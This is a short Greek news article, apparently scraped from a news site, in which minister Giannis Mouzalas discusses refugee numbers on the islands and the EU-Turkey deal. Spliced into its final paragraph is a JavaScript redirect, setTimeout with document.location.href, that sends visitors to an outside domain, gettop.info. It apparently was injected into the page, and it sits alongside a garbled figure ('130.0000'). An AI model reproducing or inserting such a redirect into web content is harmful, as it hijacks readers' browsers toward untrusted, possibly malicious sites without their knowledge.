Μουζάλας: Έως 12.000 οι πρόσφυγες στα νησιά

0
5

 

Την εκτίμηση ότι οι πρόσφυγες και μετανάστες που βρίσκονται στα ελληνικά νησιά είναι από 10 έως 12 χιλιάδες εξέφρασε ο Γιάννης Μουζάλας μιλώντας στην Πρωινή Ζώνη της ΕΡΤ.

Ο υπουργός διατύπωσε την θέση ότι με βάση τη συμφωνία στα νησιά θα πρέπει να παραμείνουν αυτοί που εισέρχονται. Χαρακτήρισε ακραία την άποψη «διώξτε τους πρόσφυγες» που ακούγεται στη Χίο. «Εάν φύγουν οι πρόσφυγες, θα πέσει η συμφωνία και από την επόμενη μέρα οι μεταναστευτικές ροές από τη γειτονική Τουρκία θα φτάνουν και τις 4.000 καθημερινά», είπε χαρακτηριστικά ο κ. Μουζάλας, όπως αναφέρει το ert.gr.

Ο κ. Μουζάλας υπεραμύνθηκε της συμφωνίας για το προσφυγικό προσθέτοντας ότι με αυτήν δεν παρέμειναν στη χώρα 130.0000 προσφυγές και μετανάστες, που θα είχαν εγκλωβιστεί. Αναγνώρισε επίσης πως υπάρχουν καθυστερήσεις ως προς το πρόγραμμα για τα κέντρα φιλοξενίας. «Προτείναμε να δημιουργήσουμε κλειστά κέντρα όπου θα περιορίζαμε τους παράνομους, οι δημοτικοί άρχοντες το αρνήθηκαν » είπε χαρακτηριστικά ο υπουργός. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here